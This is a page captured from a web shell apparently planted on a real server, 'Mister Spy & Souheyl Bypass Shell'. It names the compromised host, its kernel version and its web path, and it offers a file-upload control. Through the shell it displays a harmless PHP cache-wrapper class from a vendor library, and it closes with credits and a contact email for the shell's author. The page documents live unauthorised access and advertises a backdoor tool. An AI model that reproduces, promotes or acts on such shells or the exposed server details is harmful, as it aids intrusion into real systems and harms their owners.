Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html/musik/vendor/consolidation/annotated-command/src/Cache/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html/musik/vendor/consolidation/annotated-command/src/Cache/CacheWrapper.php

<?php
namespace Consolidation\AnnotatedCommand\Cache;

/**
 * Make a generic cache object conform to our expected interface.
 */
class CacheWrapper implements SimpleCacheInterface
{
    protected $dataStore;

    public function __construct($dataStore)
    {
        $this->dataStore = $dataStore;
    }

    /**
     * Test for an entry from the cache
     * @param string $key
     * @return boolean
     */
    public function has($key)
    {
        if (method_exists($this->dataStore, 'has')) {
            return $this->dataStore->has($key);
        }
        $test = $this->dataStore->get($key);
        return !empty($test);
    }

    /**
     * Get an entry from the cache
     * @param string $key
     * @return array
     */
    public function get($key)
    {
        return (array) $this->dataStore->get($key);
    }

    /**
     * Store an entry in the cache
     * @param string $key
     * @param array $data
     */
    public function set($key, $data)
    {
        $this->dataStore->set($key, $data);
    }
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net